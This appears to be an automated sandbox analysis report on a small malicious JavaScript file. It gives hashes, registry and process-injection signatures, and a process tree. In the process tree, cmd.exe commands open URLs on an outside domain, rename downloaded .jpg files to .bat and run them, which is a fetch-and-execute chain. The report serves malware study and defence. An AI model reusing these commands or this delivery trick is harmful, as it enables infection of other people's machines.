Analysis
-
max time kernel
172s -
max time network
215s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
02-12-2022 19:19
Static task
static1
Behavioral task
behavioral1
Sample
61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
Resource
win10v2004-20220812-en
General
-
Target
61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js
-
Size
680B
-
MD5
6736d1f43e6302e8f949f7d16251e9c7
-
SHA1
6f1ef9345264627e9723443db718f37599a92e12
-
SHA256
61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc
-
SHA512
7049bf60704cbf3de01bea502eb1ebfe47109f18af4d48cbe3d8d82599ba62b31d2f76bdaa7e5b9405ae710df9fb66d8502ee3433950a9f539920b75542a6077
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376777465" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D3EA97B1-727E-11ED-B7FC-D2F8C2B78FDE} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 692 iexplore.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 692 iexplore.exe 692 iexplore.exe 1268 IEXPLORE.EXE 1268 IEXPLORE.EXE 1268 IEXPLORE.EXE 1268 IEXPLORE.EXE 516 IEXPLORE.EXE 516 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2000 wrote to memory of 516 2000 wscript.exe 28 PID 2000 wrote to memory of 516 2000 wscript.exe 28 PID 2000 wrote to memory of 516 2000 wscript.exe 28 PID 516 wrote to memory of 692 516 cmd.exe 30 PID 516 wrote to memory of 692 516 cmd.exe 30 PID 516 wrote to memory of 692 516 cmd.exe 30 PID 692 wrote to memory of 1268 692 iexplore.exe 32 PID 692 wrote to memory of 1268 692 iexplore.exe 32 PID 692 wrote to memory of 1268 692 iexplore.exe 32 PID 692 wrote to memory of 1268 692 iexplore.exe 32 PID 2000 wrote to memory of 1384 2000 wscript.exe 33 PID 2000 wrote to memory of 1384 2000 wscript.exe 33 PID 2000 wrote to memory of 1384 2000 wscript.exe 33 PID 2000 wrote to memory of 1624 2000 wscript.exe 36 PID 2000 wrote to memory of 1624 2000 wscript.exe 36 PID 2000 wrote to memory of 1624 2000 wscript.exe 36 PID 2000 wrote to memory of 1664 2000 wscript.exe 38 PID 2000 wrote to memory of 1664 2000 wscript.exe 38 PID 2000 wrote to memory of 1664 2000 wscript.exe 38 PID 2000 wrote to memory of 524 2000 wscript.exe 40 PID 2000 wrote to memory of 524 2000 wscript.exe 40 PID 2000 wrote to memory of 524 2000 wscript.exe 40 PID 2000 wrote to memory of 1204 2000 wscript.exe 42 PID 2000 wrote to memory of 1204 2000 wscript.exe 42 PID 2000 wrote to memory of 1204 2000 wscript.exe 42 PID 692 wrote to memory of 516 692 iexplore.exe 44 PID 692 wrote to memory of 516 692 iexplore.exe 44 PID 692 wrote to memory of 516 692 iexplore.exe 44 PID 692 wrote to memory of 516 692 iexplore.exe 44
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\61e0926120f49b3d5edf3a5e0842b04640911974ecbbc93b6b33ca20c1f981bc.js1⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b https://installationupgrade6.com/0ssdt1/index/b1/?servername=msi2⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://installationupgrade6.com/0ssdt1/index/b1/?servername=msi3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:692 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1268
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:692 CREDAT:4207618 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:516
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b https://installationupgrade6.com/0ssdt1/index/b2/?servername=msi2⤵PID:1384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename b1.jpg b1.bat2⤵PID:1624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename b2.jpg b2.bat2⤵PID:1664
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c b2.bat2⤵PID:524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c b1.bat2⤵PID:1204
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50CD3D75D026C82E2E718570BD6F44D0_20CC038712CEB11FDE6577FC4F848B40
Filesize313B
MD5c9e8d050c94ec145cd36e685a9888972
SHA1e8ea433c540b646f19172b68c7cfe149221a0c54
SHA2563b782373e8df45786c07e3354eb02947e418026bc4855b80be1d93d9da0db39d
SHA512de8caffdc24d5394a4d0310a7084a9441d56d5ee8c6b2ff12910ae8c17d242bc518597e3cfa61a56934ca206e12e77c1a4ac04811ba76e5e8f6b11241e438ea1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize471B
MD5e77da6e9a9be2a3136ae8ae48f40a600
SHA18bb49875df1fa56138e9285a3ceaa3d9299f81eb
SHA256a9677f964dd3a18a2b74385ede2d9dcb36913e81b02b5190fcf2ce0b3499e161
SHA512afed382b106eac94c4f7fd0986c92ba8433c322b832ab2a9e90b27b4b68b4adcbf6da645301f8aac3c0357aa56ede5f5ea2ed6424543da7df289d879409840f0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize471B
MD5e77da6e9a9be2a3136ae8ae48f40a600
SHA18bb49875df1fa56138e9285a3ceaa3d9299f81eb
SHA256a9677f964dd3a18a2b74385ede2d9dcb36913e81b02b5190fcf2ce0b3499e161
SHA512afed382b106eac94c4f7fd0986c92ba8433c322b832ab2a9e90b27b4b68b4adcbf6da645301f8aac3c0357aa56ede5f5ea2ed6424543da7df289d879409840f0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50CD3D75D026C82E2E718570BD6F44D0_20CC038712CEB11FDE6577FC4F848B40
Filesize404B
MD5486cd073b039019286a2fc9c73ef61e2
SHA19b831082586ff30d9c78e33cf6051cb6fea40df9
SHA256b2119b073ca5e6fbfca24a42c590d30cb7c370f83452002254fd08c20e04838d
SHA512ea9bf8bf5c8915b56ade723dd34d2e6997cff100870b2282fe62654eddba6cee037c0f4016991e241373afc9780c12ed0e533636035460f113d60bb65eedeae3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5de7307c066517bca5ce3df2dd7fbae58
SHA1d5d650385c50775266ea6e43f1e93329e4001765
SHA2561c0b497451b7c2f704b3f990a6563ebfee6d0b6e79db43237e21f8f934ed9608
SHA512e165059d96384385da7c097f3406c9f0f95f8f1a242b6acc3e43de03e598444e26cb56472edbd8d176722265f6d6b2dee2e08eabbaa13894b5e6d1cc9603d5b9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize434B
MD5f3d0ee3d3ddd993ab1f543dd741329b5
SHA1d8c678a1c05de5d1a0ae8e9fbf9639d32c14402f
SHA25651fd2f36a9c9a2f039c23c65d0a98810d78bf33600db5e019f438aa8d4645c7f
SHA5124051869f9db21c5a01b9ab36e034c7aa7189426e231cbbd3f6f6677ea0a18d2cac7d04764867284543e466d5749d0bcfd63b5557c538f0e98769169e7e09eaff
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize434B
MD5d5be2fc1bf23e60a94afd7422e8fa278
SHA19e038512cdb8cde450e67618412ce68ec8d18ef4
SHA256003ba216a2a4f8b5fa658c8bba8d9457783821f51738d369a8c993e6b68b6836
SHA512561644d123cd48043201241145cf4e7c6db0e6853ce3bd32f14531765a54a382fed83398162ef5563ef405a071e87c2b737458279908c5bf500c7a81ebb01a68
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize434B
MD5d5be2fc1bf23e60a94afd7422e8fa278
SHA19e038512cdb8cde450e67618412ce68ec8d18ef4
SHA256003ba216a2a4f8b5fa658c8bba8d9457783821f51738d369a8c993e6b68b6836
SHA512561644d123cd48043201241145cf4e7c6db0e6853ce3bd32f14531765a54a382fed83398162ef5563ef405a071e87c2b737458279908c5bf500c7a81ebb01a68
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize404B
MD53574d57d5af15b40e553bc653213c5bd
SHA14ed0db8178e00f18e819790b07884964df350cf9
SHA25652331585b38e810888426fdd50c4e477019351fc270f1bd403697895fe9b7cd3
SHA512aaa9878d50549f013335d7934d76f611eb165eb0fec17ded02d2f6ef7d95a72a3f77e93aabe3cd9be094ac2421587acf3be87236c9c3269463d53a4f0a0bc9d2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize404B
MD53574d57d5af15b40e553bc653213c5bd
SHA14ed0db8178e00f18e819790b07884964df350cf9
SHA25652331585b38e810888426fdd50c4e477019351fc270f1bd403697895fe9b7cd3
SHA512aaa9878d50549f013335d7934d76f611eb165eb0fec17ded02d2f6ef7d95a72a3f77e93aabe3cd9be094ac2421587acf3be87236c9c3269463d53a4f0a0bc9d2
-
Filesize
533B
MD569d41fdc50ed80b6111b2ebf4e754026
SHA117f0c2b118de27f5bd52308a50c4afd0d12ffa1c
SHA2564eee1ebeaa8b3c4e4a8acbce117e75f7516fff0b1670b5d4bc321f844ecff9fc
SHA512988b7dfe8f3c29de05c6b67170536b12a6b16cbb91759e77c5d3b3a4b2aa22dc6d21c3f94acf6cc59dfbd1a59be3954227445ed77f54f7754bc798da9039df7d